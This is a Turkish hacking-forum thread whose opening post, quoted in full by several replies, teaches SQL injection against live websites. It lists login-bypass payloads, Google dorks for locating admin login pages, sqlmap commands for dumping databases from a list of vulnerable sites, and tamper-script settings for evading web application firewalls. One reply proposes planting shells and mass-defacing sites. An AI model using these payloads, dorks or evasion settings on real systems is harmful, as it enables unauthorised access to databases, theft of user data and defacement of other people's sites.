SQL İNJECTİON | Sancak Ofansif Savunma Kulübü

[Benozan5400]

​

herkese selam öncelikle ben sancak ofansif ve savunma kulübü üyesi ozan bu günkü görevim sql injection

SQL NEDİR ?​

SQL (Structured Query language) veritabanına erişim ve yönetim için kullanılır. Veritabanlarına kayıt ekleme silme değiştirme gibi işlemler yapılır.

NEDİR SQL İNJECTİON ?​

web uygulamalarında kodlanma sırasındaki hatalar ve dikkatsizliklerdir. Basit gibi gözüksede bir sitenin sonu olabilir.

TEMEL SQL KOMUT DİZİNLERİNE BAKALIM ​

SELECT

veri tabanında seçmek için kulanılır. en basit kullanımı ise
SELECT columns_name FROM table name
SELECT * FROM table name ( * ) işareti konulunca kolonları ayırt etmeden hepsini sunar önümüze

WHERE

veri tabanında istenen veriyi belirli kriterlere göre seçmemizi sağlar. en basit kkullanımı ise :

SELECT column_name * FROM table_name WHERE column_name operator value

AND VE OR

birden fazla koşul dayalı seçim yapmayı sağlar. en basit kullanımı ise :

SELECT * FROM exampletable WHERE isim='ofansif' AND isim='defans' (iki koşulunda olması grekiyor )
SELECT * FROM exampletable WHERE isim='ofansif' OR isim='defans' (iki koşuludan biri olması grekiyor )

SQLin temeli attık şimdi de sömürelim ​

sql de ahata almak için (') tek tırnak kullanılır örnek:

SELECT * FROM isim WHERE user='kullanıcıadı' AND password='şifre'
şimdi isim adındaki tabloda kullanıcıadı ve şifre eşleşirse giriş yapılır eşleşmezse başka sayfaya yönlendirecek yada hata verecek

ozaman sürekli doğru olacak bir kod bulmamız lazım oda :
SELECT * FROM isim WHERE user = ' ' OR ' ' = ' ' AND password ' ' OR ' ' = ' '
şimdi burda kullanıcıadı boş ve şifresi boş olanları alacak fakat ' = ' koyduyğumuz için bir işlem yapacak ve bunun sonucu 1 olacak dolayısıyla tablodaki 1. kişi ile giriş yapmış olacaz
eğer bu olmaz ise diğer login için kullanılan bypassları deneyebilirirz :

LOGİN BYPASS​

''Or'='Or''
anything' OR 'x'='x
1'or'1'='1
' or 1=1 or ''='
" or 1=1 or ""="
' OR ''='
'' OR ''=''
'OR''='
hey' or 1=1–
''Or 1 = 1'
' or 1=1--
bu giriş siteleri bulmak için ise bu dorkları kullanabiliriz

GOOGLE DORKLARI​

inurl:adminPanel/index.php
inurl:adminlogin.aspx
inurl:admin/index.php
inurl:administrator.php
inurl:administrator.asp
inurl:login.asp
inurl:login.aspx
inurl:login.php
inurl:admin/index.php
inurl:adminlogin.aspx

bunları en kolay nasıl yaparız ?
tabikide sqlmap ile
sqlmap kali linnux içinde hazır gelmekte komut satırına sqlmap -h yazarak parametreleri görebiliriz
temel kullanımı ise “sqlmap -u “http://orneksite.com/veritabani” –dbs” yazarak başlayabiliriz

​

ve çıkan sonuç bunun gibi olacak

​

evet veri tabanımıza ulaştık şimdi ise tablolara bakalım

​

evet tabloları da bulduk

​

sırada colonlar var

​

colonların sonucu

​

evet her şeyi bulduk kaldı son bir işlem tüm bilgileri toplamak onun içinde

​

-dbs = Var olan veri tabanlarını talep et.
-dbms = Veri tabanı yönetim sistemini biliyorsan bu parametreyle belirt.
-D = Hangi veri tabanına erişmek istediğini belirt.
-tables = Tabloların tamamını talep et.
-T = Hangi tabloya erişmek istediğini belirt.
-columns = Tüm kolon isimlerini talep et.
-C = İstediğin kolon isimlerini belirt.
-dump = İçeriği talep et.

sürekli tek tek mi yapacaz hayır burda da ' -m ' parametresi giriyor sorgumuz ise şöyle değişiyor
sqlmap -m sqlacikli_liste.txt --dbs

böylece sqlmap temeli hallettik

fakat gerçekte WAF dediğimiz güvenlik duvarları var bunu da atlatırız nasıl mı ?
tamper scriptleri ile halledecez
Genel tamper kullanım örneği = tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
MySQL = tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor
MsSQL= tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes

sıradaki aracımız ise

jSQL Injection​

bu aracımız ise sqlmapın sade hali fakat aynı işleve sahip
indirmek için
GitHub - ron190/jsql-injection: jSQL Injection is a Java application for automatic SQL database injection.

kurulumu :
komut satırına : apt-get -f install jsql
herşeyi öğrendik siteleri nasıl bulacaz ?
google dork sayesinde

google dork​

inurl:

• Sorgunuza [inurl:] eklerseniz, Google sonuçları URL'de bu kelimeyi içeren belgelerle sınırlar. Örneğin, [inurl:google search] URL'lerinde "google" kelimesini geçen belgeleri ve belgenin herhangi bir yerinde (url veya değil) "search" kelimesini geçen belgeleri döndürür. Sorgunuzdaki her kelimenin önüne "inurl:" koymak, sorgunuzun önüne "allinurl:" koymaya eşdeğerdir: [inurl:google inurl:search], [allinurl: google search] ile aynıdır.

allinurl:

• Bir sorguyu [allinurl:] ile başlatırsanız, Google sonuçları URL'de tüm sorgu sözcüklerini içerenlerle sınırlar. Örneğin, [allinurl: google search] yalnızca URL'de hem "google" hem de "search" bulunan belgeleri döndürür. [allinurl:]'nin URL bileşenleri üzerinde değil, sözcükler üzerinde çalıştığını unutmayın. Özellikle noktalama işaretlerini yok sayar. Bu nedenle, [allinurl: foo/bar] sonuçları URL'de "foo" ve "bar" sözcüklerini içeren sayfayla sınırlar, ancak bunların URL içinde eğik çizgiyle ayrılmasını, bitişik olmasını veya belirli sözcük sırasında olmasını gerektirmez. Şu anda bu kısıtlamaları uygulamanın bir yolu yoktur.

intitle:

• Sorgunuza [intitle:] eklerseniz, Google sonuçları başlıkta bu kelimeyi içeren belgelerle sınırlar. Örneğin, [intitle:google search] başlığında “google” kelimesi geçen ve belgenin herhangi bir yerinde (başlıkta veya başlıkta değil) “search” kelimesi geçen belgeleri döndürür. Sorgunuzdaki her kelimenin önüne [intitle:] koymak, sorgunuzun önüne [allintitle:] koymaya eşdeğerdir: [intitle:google intitle:search], [allintitle: google search] ile aynıdır.

allintitle:

• Bir sorguyu [allintitle:] ile başlatırsanız, Google sonuçları başlıkta tüm sorgu sözcüklerini içerenlerle sınırlar. Örneğin, [allintitle: google search] yalnızca başlıkta hem “google” hem de “search” bulunan belgeleri döndürür.

site:

• Sorgunuza [site:] eklerseniz, Google sonuçları belirtilen etki alanındaki web siteleriyle sınırlar. Örneğin, [help site:www.google.com], www.google.com içindeki yardımla ilgili sayfaları bulur. [help site:com], .com URL'leri içindeki yardımla ilgili sayfaları bulur. "site:" ile etki alanı arasında boşluk olamayacağını unutmayın.

stocks:

• Sorguyu [stocks:] operatörüyle başlatırsanız, Google sorgu terimlerinin geri kalanını hisse senedi sembolü olarak ele alır ve bu semboller için hisse senedi bilgilerini gösteren bir sayfaya bağlantı verir. Örneğin, [stocks: intc yhoo] Intel ve Yahoo hakkında bilgi gösterir. (Şirket adını değil, hisse senedi sembollerini yazmanız gerektiğini unutmayın.)

info:

• [info:www.google.com] Google ana sayfası hakkında bilgi gösterecektir.

ilk konumdu atladığım unuttuğum bir yer varsa söylerseniz ona göre düzenlerim tekrar

 

[slowbaskan123]

​

herkese selam öncelikle ben sancak ofansif ve savunma kulübü üyesi ozan bu günkü görevim sql injection

SQL NEDİR ?​

SQL (Structured Query language) veritabanına erişim ve yönetim için kullanılır. Veritabanlarına kayıt ekleme silme değiştirme gibi işlemler yapılır.

NEDİR SQL İNJECTİON ?​

web uygulamalarında kodlanma sırasındaki hatalar ve dikkatsizliklerdir. Basit gibi gözüksede bir sitenin sonu olabilir.

TEMEL SQL KOMUT DİZİNLERİNE BAKALIM ​

SELECT

veri tabanında seçmek için kulanılır. en basit kullanımı ise
SELECT columns_name FROM table name
SELECT * FROM table name ( * ) işareti konulunca kolonları ayırt etmeden hepsini sunar önümüze

WHERE

veri tabanında istenen veriyi belirli kriterlere göre seçmemizi sağlar. en basit kkullanımı ise :

SELECT column_name * FROM table_name WHERE column_name operator value

AND VE OR

birden fazla koşul dayalı seçim yapmayı sağlar. en basit kullanımı ise :

SELECT * FROM exampletable WHERE isim='ofansif' AND isim='defans' (iki koşulunda olması grekiyor )
SELECT * FROM exampletable WHERE isim='ofansif' OR isim='defans' (iki koşuludan biri olması grekiyor )

SQLin temeli attık şimdi de sömürelim ​

sql de ahata almak için (') tek tırnak kullanıcaz örnek:

SELECT * FROM isim WHERE user='kullanıcıadı' AND password='şifre'
şimdi isim adındaki tabloda kullanıcıadı ve şifre eşleşirse giriş yapılır eşleşmezse başka sayfaya yönlendirecek yada hata verecek

ozaman sürekli doğru olacak bir kod bulmamız lazım oda :
SELECT * FROM isim WHERE user = ' ' OR ' ' = ' ' AND password ' ' OR ' ' = ' '
şimdi burda kullanıcıadı boş ve şifresi boş olanları alacak fakat = koyduyğumuz için bir işlem yapacak ve bunun sonucu 1 olacak dolayısıyla tablodaki 1. kişi ile giriş yapmış olacaz
eğer bu olaz se diğer login için kullanılan bypassları deneyebilirirz :

LOGİN BYPASS​

''Or'='Or''
anything' OR 'x'='x
1'or'1'='1
' or 1=1 or ''='
" or 1=1 or ""="
' OR ''='
'' OR ''=''
'OR''='
hey' or 1=1–
''Or 1 = 1'
' or 1=1--
nu giriş siteleri bulmak için ise bu dorkları kullanabiliriz

GOOGLE DORKLARI​

inurl:adminPanel/index.php
inurl:adminlogin.aspx
inurl:admin/index.php
inurl:administrator.php
inurl:administrator.asp
inurl:login.asp
inurl:login.aspx
inurl:login.php
inurl:admin/index.php
inurl:adminlogin.aspx

bunları en kolay nasıl yaparız ?
tabikide sqlmap ile
sqlmap kali linnux içinde hazır gelmekte komut satırına sqlmap -h yazarak parametreleri görebiliriz
temel kullanımı ise “sqlmap -u “http://orneksite.com/veritabani” –dbs” yazarak başlayabiliriz

​

ve çıkan sonuç bunun gibi olacak

​

evet veri tabanımıza ulaştık şimdi ise tablolara bakalım

​

evet tablolarıda bulduk

​

sırada colonlar var

​

colonların sonucu

​

evet her şeyi bulduk kaldı son bir işlem tüm bilgileri toplamak onun içinde

​

-dbs = Var olan veri tabanlarını talep et.
-dbms = Veri tabanı yönetim sistemini biliyorsan bu parametreyle belirt.
-D = Hangi veri tabanına erişmek istediğini belirt.
-tables = Tabloların tamamını talep et.
-T = Hangi tabloya erişmek istediğini belirt.
-columns = Tüm kolon isimlerini talep et.
-C = İstediğin kolon isimlerini belirt.
-dump = İçeriği talep et.

sürekli tek tek mi yapacaz hayır burda da ' -m ' parametresi giriyor sorgumuz ise şöyle değişiyor
sqlmap -m sqlacikli_liste.txt --dbs

böylece sqlmap temeli hallettik

fakat gerçekte WAF dediğimiz güvenlik duvarları var bunu da atlatırız nasıl mı ?
tamper scriptleri ile halledecez
Genel temper kullanım örneği = tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
MySQL = tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor
MsSQL= tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes

sıradaki aracımız ise

jSQL Injection​

bu aracımız ise sqlmapın sade hali fakat aynı işleve sahip
indirmek için
GitHub - ron190/jsql-injection: jSQL Injection is a Java application for automatic SQL database injection.

kurulumu :
komut satırına : apt-get -f install jsql
herşeyi öğrendik siteleri nasıl bulacaz ?
google dork sayesinde

google dork​

inurl:

• Sorgunuza [inurl:] eklerseniz, Google sonuçları URL'de bu kelimeyi içeren belgelerle sınırlar. Örneğin, [inurl:google search] URL'lerinde "google" kelimesini geçen belgeleri ve belgenin herhangi bir yerinde (url veya değil) "search" kelimesini geçen belgeleri döndürür. Sorgunuzdaki her kelimenin önüne "inurl:" koymak, sorgunuzun önüne "allinurl:" koymaya eşdeğerdir: [inurl:google inurl:search], [allinurl: google search] ile aynıdır.

allinurl:

• Bir sorguyu [allinurl:] ile başlatırsanız, Google sonuçları URL'de tüm sorgu sözcüklerini içerenlerle sınırlar. Örneğin, [allinurl: google search] yalnızca URL'de hem "google" hem de "search" bulunan belgeleri döndürür. [allinurl:]'nin URL bileşenleri üzerinde değil, sözcükler üzerinde çalıştığını unutmayın. Özellikle noktalama işaretlerini yok sayar. Bu nedenle, [allinurl: foo/bar] sonuçları URL'de "foo" ve "bar" sözcüklerini içeren sayfayla sınırlar, ancak bunların URL içinde eğik çizgiyle ayrılmasını, bitişik olmasını veya belirli sözcük sırasında olmasını gerektirmez. Şu anda bu kısıtlamaları uygulamanın bir yolu yoktur.

intitle:

• Sorgunuza [intitle:] eklerseniz, Google sonuçları başlıkta bu kelimeyi içeren belgelerle sınırlar. Örneğin, [intitle:google search] başlığında “google” kelimesi geçen ve belgenin herhangi bir yerinde (başlıkta veya başlıkta değil) “search” kelimesi geçen belgeleri döndürür. Sorgunuzdaki her kelimenin önüne [intitle:] koymak, sorgunuzun önüne [allintitle:] koymaya eşdeğerdir: [intitle:google intitle:search], [allintitle: google search] ile aynıdır.

allintitle:

• Bir sorguyu [allintitle:] ile başlatırsanız, Google sonuçları başlıkta tüm sorgu sözcüklerini içerenlerle sınırlar. Örneğin, [allintitle: google search] yalnızca başlıkta hem “google” hem de “search” bulunan belgeleri döndürür.

site:

• Sorgunuza [site:] eklerseniz, Google sonuçları belirtilen etki alanındaki web siteleriyle sınırlar. Örneğin, [help site:www.google.com], www.google.com içindeki yardımla ilgili sayfaları bulur. [help site:com], .com URL'leri içindeki yardımla ilgili sayfaları bulur. "site:" ile etki alanı arasında boşluk olamayacağını unutmayın.

stocks:

• Sorguyu [stocks:] operatörüyle başlatırsanız, Google sorgu terimlerinin geri kalanını hisse senedi sembolü olarak ele alır ve bu semboller için hisse senedi bilgilerini gösteren bir sayfaya bağlantı verir. Örneğin, [stocks: intc yhoo] Intel ve Yahoo hakkında bilgi gösterir. (Şirket adını değil, hisse senedi sembollerini yazmanız gerektiğini unutmayın.)

info:

• [info:www.google.com] Google ana sayfası hakkında bilgi gösterecektir.

ilk konumdu atladığım unuttuğum bir yer varsa söylerseniz ona göre düzenlerim tekrar

Hocam eline sağlık fakat SQL artık kaldımı belki unutulan sitelerde vardır.

 

[hacker11548]

Bu methodlar burada yeni başlayan arkadaşlara söküyor sadece Yine de buradaki bir kaç bilginin daha önce bilinmediğine şahit olduğumdan beğeniyorum

 

[Benozan5400]

basit sitelere bakarak shell sokabilirsek massdeface yaparak belki daha fazla siteye ulaşmış olacak belki o sitellerin içinde unutulmayan bir kaç site buluruz

Hocam eline sağlık fakat SQL artık kaldımı belki unutulan sitelerde vardır.

Bu methodlar burada yeni başlayan arkadaşlara söküyor sadece Yine de buradaki bir kaç bilginin daha önce bilinmediğine şahit olduğumdan beğeniyorum

teşekürler yorumunuz için

 

[root@C32UR]

​

herkese selam öncelikle ben sancak ofansif ve savunma kulübü üyesi ozan bu günkü görevim sql injection

SQL NEDİR ?​

SQL (Structured Query language) veritabanına erişim ve yönetim için kullanılır. Veritabanlarına kayıt ekleme silme değiştirme gibi işlemler yapılır.

NEDİR SQL İNJECTİON ?​

web uygulamalarında kodlanma sırasındaki hatalar ve dikkatsizliklerdir. Basit gibi gözüksede bir sitenin sonu olabilir.

TEMEL SQL KOMUT DİZİNLERİNE BAKALIM ​

SELECT

veri tabanında seçmek için kulanılır. en basit kullanımı ise
SELECT columns_name FROM table name
SELECT * FROM table name ( * ) işareti konulunca kolonları ayırt etmeden hepsini sunar önümüze

WHERE

veri tabanında istenen veriyi belirli kriterlere göre seçmemizi sağlar. en basit kkullanımı ise :

SELECT column_name * FROM table_name WHERE column_name operator value

AND VE OR

birden fazla koşul dayalı seçim yapmayı sağlar. en basit kullanımı ise :

SELECT * FROM exampletable WHERE isim='ofansif' AND isim='defans' (iki koşulunda olması grekiyor )
SELECT * FROM exampletable WHERE isim='ofansif' OR isim='defans' (iki koşuludan biri olması grekiyor )

SQLin temeli attık şimdi de sömürelim ​

sql de ahata almak için (') tek tırnak kullanıcaz örnek:

SELECT * FROM isim WHERE user='kullanıcıadı' AND password='şifre'
şimdi isim adındaki tabloda kullanıcıadı ve şifre eşleşirse giriş yapılır eşleşmezse başka sayfaya yönlendirecek yada hata verecek

ozaman sürekli doğru olacak bir kod bulmamız lazım oda :
SELECT * FROM isim WHERE user = ' ' OR ' ' = ' ' AND password ' ' OR ' ' = ' '
şimdi burda kullanıcıadı boş ve şifresi boş olanları alacak fakat = koyduyğumuz için bir işlem yapacak ve bunun sonucu 1 olacak dolayısıyla tablodaki 1. kişi ile giriş yapmış olacaz
eğer bu olaz se diğer login için kullanılan bypassları deneyebilirirz :

LOGİN BYPASS​

''Or'='Or''
anything' OR 'x'='x
1'or'1'='1
' or 1=1 or ''='
" or 1=1 or ""="
' OR ''='
'' OR ''=''
'OR''='
hey' or 1=1–
''Or 1 = 1'
' or 1=1--
nu giriş siteleri bulmak için ise bu dorkları kullanabiliriz

GOOGLE DORKLARI​

inurl:adminPanel/index.php
inurl:adminlogin.aspx
inurl:admin/index.php
inurl:administrator.php
inurl:administrator.asp
inurl:login.asp
inurl:login.aspx
inurl:login.php
inurl:admin/index.php
inurl:adminlogin.aspx

bunları en kolay nasıl yaparız ?
tabikide sqlmap ile
sqlmap kali linnux içinde hazır gelmekte komut satırına sqlmap -h yazarak parametreleri görebiliriz
temel kullanımı ise “sqlmap -u “http://orneksite.com/veritabani” –dbs” yazarak başlayabiliriz

​

ve çıkan sonuç bunun gibi olacak

​

evet veri tabanımıza ulaştık şimdi ise tablolara bakalım

​

evet tablolarıda bulduk

​

sırada colonlar var

​

colonların sonucu

​

evet her şeyi bulduk kaldı son bir işlem tüm bilgileri toplamak onun içinde

​

-dbs = Var olan veri tabanlarını talep et.
-dbms = Veri tabanı yönetim sistemini biliyorsan bu parametreyle belirt.
-D = Hangi veri tabanına erişmek istediğini belirt.
-tables = Tabloların tamamını talep et.
-T = Hangi tabloya erişmek istediğini belirt.
-columns = Tüm kolon isimlerini talep et.
-C = İstediğin kolon isimlerini belirt.
-dump = İçeriği talep et.

sürekli tek tek mi yapacaz hayır burda da ' -m ' parametresi giriyor sorgumuz ise şöyle değişiyor
sqlmap -m sqlacikli_liste.txt --dbs

böylece sqlmap temeli hallettik

fakat gerçekte WAF dediğimiz güvenlik duvarları var bunu da atlatırız nasıl mı ?
tamper scriptleri ile halledecez
Genel temper kullanım örneği = tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
MySQL = tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor
MsSQL= tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes

sıradaki aracımız ise

jSQL Injection​

bu aracımız ise sqlmapın sade hali fakat aynı işleve sahip
indirmek için
GitHub - ron190/jsql-injection: jSQL Injection is a Java application for automatic SQL database injection.

kurulumu :
komut satırına : apt-get -f install jsql
herşeyi öğrendik siteleri nasıl bulacaz ?
google dork sayesinde

google dork​

inurl:

• Sorgunuza [inurl:] eklerseniz, Google sonuçları URL'de bu kelimeyi içeren belgelerle sınırlar. Örneğin, [inurl:google search] URL'lerinde "google" kelimesini geçen belgeleri ve belgenin herhangi bir yerinde (url veya değil) "search" kelimesini geçen belgeleri döndürür. Sorgunuzdaki her kelimenin önüne "inurl:" koymak, sorgunuzun önüne "allinurl:" koymaya eşdeğerdir: [inurl:google inurl:search], [allinurl: google search] ile aynıdır.

allinurl:

• Bir sorguyu [allinurl:] ile başlatırsanız, Google sonuçları URL'de tüm sorgu sözcüklerini içerenlerle sınırlar. Örneğin, [allinurl: google search] yalnızca URL'de hem "google" hem de "search" bulunan belgeleri döndürür. [allinurl:]'nin URL bileşenleri üzerinde değil, sözcükler üzerinde çalıştığını unutmayın. Özellikle noktalama işaretlerini yok sayar. Bu nedenle, [allinurl: foo/bar] sonuçları URL'de "foo" ve "bar" sözcüklerini içeren sayfayla sınırlar, ancak bunların URL içinde eğik çizgiyle ayrılmasını, bitişik olmasını veya belirli sözcük sırasında olmasını gerektirmez. Şu anda bu kısıtlamaları uygulamanın bir yolu yoktur.

intitle:

• Sorgunuza [intitle:] eklerseniz, Google sonuçları başlıkta bu kelimeyi içeren belgelerle sınırlar. Örneğin, [intitle:google search] başlığında “google” kelimesi geçen ve belgenin herhangi bir yerinde (başlıkta veya başlıkta değil) “search” kelimesi geçen belgeleri döndürür. Sorgunuzdaki her kelimenin önüne [intitle:] koymak, sorgunuzun önüne [allintitle:] koymaya eşdeğerdir: [intitle:google intitle:search], [allintitle: google search] ile aynıdır.

allintitle:

• Bir sorguyu [allintitle:] ile başlatırsanız, Google sonuçları başlıkta tüm sorgu sözcüklerini içerenlerle sınırlar. Örneğin, [allintitle: google search] yalnızca başlıkta hem “google” hem de “search” bulunan belgeleri döndürür.

site:

• Sorgunuza [site:] eklerseniz, Google sonuçları belirtilen etki alanındaki web siteleriyle sınırlar. Örneğin, [help site:www.google.com], www.google.com içindeki yardımla ilgili sayfaları bulur. [help site:com], .com URL'leri içindeki yardımla ilgili sayfaları bulur. "site:" ile etki alanı arasında boşluk olamayacağını unutmayın.

stocks:

• Sorguyu [stocks:] operatörüyle başlatırsanız, Google sorgu terimlerinin geri kalanını hisse senedi sembolü olarak ele alır ve bu semboller için hisse senedi bilgilerini gösteren bir sayfaya bağlantı verir. Örneğin, [stocks: intc yhoo] Intel ve Yahoo hakkında bilgi gösterir. (Şirket adını değil, hisse senedi sembollerini yazmanız gerektiğini unutmayın.)

info:

• [info:www.google.com] Google ana sayfası hakkında bilgi gösterecektir.

ilk konumdu atladığım unuttuğum bir yer varsa söylerseniz ona göre düzenlerim tekrar

hocam oncelikle ellerine saglik baya ugrasmissin ama su an sql map unutulan siteleri cikmakla kullanilmiyor artik boyle bir acik artik yok kapatildi ama buna benzer yada baska bi web attack toollari varmi guncel bildiyiniz?

 

[Benozan5400]

hocam oncelikle ellerine saglik baya ugrasmissin ama su an sql map unutulan siteleri cikmakla kullanilmiyor artik boyle bir acik artik yok kapatildi ama buna benzer yada baska bi web attack toollari varmi guncel bildiyiniz?

yeni yeni öğreniyorum öğrenirsem burada paylaşırım tabikide

 

[MR GLOBAL]

​

herkese selam öncelikle ben sancak ofansif ve savunma kulübü üyesi ozan bu günkü görevim sql injection

SQL NEDİR ?​

SQL (Structured Query language) veritabanına erişim ve yönetim için kullanılır. Veritabanlarına kayıt ekleme silme değiştirme gibi işlemler yapılır.

NEDİR SQL İNJECTİON ?​

web uygulamalarında kodlanma sırasındaki hatalar ve dikkatsizliklerdir. Basit gibi gözüksede bir sitenin sonu olabilir.

TEMEL SQL KOMUT DİZİNLERİNE BAKALIM ​

SELECT

veri tabanında seçmek için kulanılır. en basit kullanımı ise
SELECT columns_name FROM table name
SELECT * FROM table name ( * ) işareti konulunca kolonları ayırt etmeden hepsini sunar önümüze

WHERE

veri tabanında istenen veriyi belirli kriterlere göre seçmemizi sağlar. en basit kkullanımı ise :

SELECT column_name * FROM table_name WHERE column_name operator value

AND VE OR

birden fazla koşul dayalı seçim yapmayı sağlar. en basit kullanımı ise :

SELECT * FROM exampletable WHERE isim='ofansif' AND isim='defans' (iki koşulunda olması grekiyor )
SELECT * FROM exampletable WHERE isim='ofansif' OR isim='defans' (iki koşuludan biri olması grekiyor )

SQLin temeli attık şimdi de sömürelim ​

sql de ahata almak için (') tek tırnak kullanıcaz örnek:

SELECT * FROM isim WHERE user='kullanıcıadı' AND password='şifre'
şimdi isim adındaki tabloda kullanıcıadı ve şifre eşleşirse giriş yapılır eşleşmezse başka sayfaya yönlendirecek yada hata verecek

ozaman sürekli doğru olacak bir kod bulmamız lazım oda :
SELECT * FROM isim WHERE user = ' ' OR ' ' = ' ' AND password ' ' OR ' ' = ' '
şimdi burda kullanıcıadı boş ve şifresi boş olanları alacak fakat = koyduyğumuz için bir işlem yapacak ve bunun sonucu 1 olacak dolayısıyla tablodaki 1. kişi ile giriş yapmış olacaz
eğer bu olaz se diğer login için kullanılan bypassları deneyebilirirz :

LOGİN BYPASS​

''Or'='Or''
anything' OR 'x'='x
1'or'1'='1
' or 1=1 or ''='
" or 1=1 or ""="
' OR ''='
'' OR ''=''
'OR''='
hey' or 1=1–
''Or 1 = 1'
' or 1=1--
nu giriş siteleri bulmak için ise bu dorkları kullanabiliriz

GOOGLE DORKLARI​

inurl:adminPanel/index.php
inurl:adminlogin.aspx
inurl:admin/index.php
inurl:administrator.php
inurl:administrator.asp
inurl:login.asp
inurl:login.aspx
inurl:login.php
inurl:admin/index.php
inurl:adminlogin.aspx

bunları en kolay nasıl yaparız ?
tabikide sqlmap ile
sqlmap kali linnux içinde hazır gelmekte komut satırına sqlmap -h yazarak parametreleri görebiliriz
temel kullanımı ise “sqlmap -u “http://orneksite.com/veritabani” –dbs” yazarak başlayabiliriz

​

ve çıkan sonuç bunun gibi olacak

​

evet veri tabanımıza ulaştık şimdi ise tablolara bakalım

​

evet tablolarıda bulduk

​

sırada colonlar var

​

colonların sonucu

​

evet her şeyi bulduk kaldı son bir işlem tüm bilgileri toplamak onun içinde

​

-dbs = Var olan veri tabanlarını talep et.
-dbms = Veri tabanı yönetim sistemini biliyorsan bu parametreyle belirt.
-D = Hangi veri tabanına erişmek istediğini belirt.
-tables = Tabloların tamamını talep et.
-T = Hangi tabloya erişmek istediğini belirt.
-columns = Tüm kolon isimlerini talep et.
-C = İstediğin kolon isimlerini belirt.
-dump = İçeriği talep et.

sürekli tek tek mi yapacaz hayır burda da ' -m ' parametresi giriyor sorgumuz ise şöyle değişiyor
sqlmap -m sqlacikli_liste.txt --dbs

böylece sqlmap temeli hallettik

fakat gerçekte WAF dediğimiz güvenlik duvarları var bunu da atlatırız nasıl mı ?
tamper scriptleri ile halledecez
Genel temper kullanım örneği = tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
MySQL = tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor
MsSQL= tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes

sıradaki aracımız ise

jSQL Injection​

bu aracımız ise sqlmapın sade hali fakat aynı işleve sahip
indirmek için
GitHub - ron190/jsql-injection: jSQL Injection is a Java application for automatic SQL database injection.

kurulumu :
komut satırına : apt-get -f install jsql
herşeyi öğrendik siteleri nasıl bulacaz ?
google dork sayesinde

google dork​

inurl:

• Sorgunuza [inurl:] eklerseniz, Google sonuçları URL'de bu kelimeyi içeren belgelerle sınırlar. Örneğin, [inurl:google search] URL'lerinde "google" kelimesini geçen belgeleri ve belgenin herhangi bir yerinde (url veya değil) "search" kelimesini geçen belgeleri döndürür. Sorgunuzdaki her kelimenin önüne "inurl:" koymak, sorgunuzun önüne "allinurl:" koymaya eşdeğerdir: [inurl:google inurl:search], [allinurl: google search] ile aynıdır.

allinurl:

• Bir sorguyu [allinurl:] ile başlatırsanız, Google sonuçları URL'de tüm sorgu sözcüklerini içerenlerle sınırlar. Örneğin, [allinurl: google search] yalnızca URL'de hem "google" hem de "search" bulunan belgeleri döndürür. [allinurl:]'nin URL bileşenleri üzerinde değil, sözcükler üzerinde çalıştığını unutmayın. Özellikle noktalama işaretlerini yok sayar. Bu nedenle, [allinurl: foo/bar] sonuçları URL'de "foo" ve "bar" sözcüklerini içeren sayfayla sınırlar, ancak bunların URL içinde eğik çizgiyle ayrılmasını, bitişik olmasını veya belirli sözcük sırasında olmasını gerektirmez. Şu anda bu kısıtlamaları uygulamanın bir yolu yoktur.

intitle:

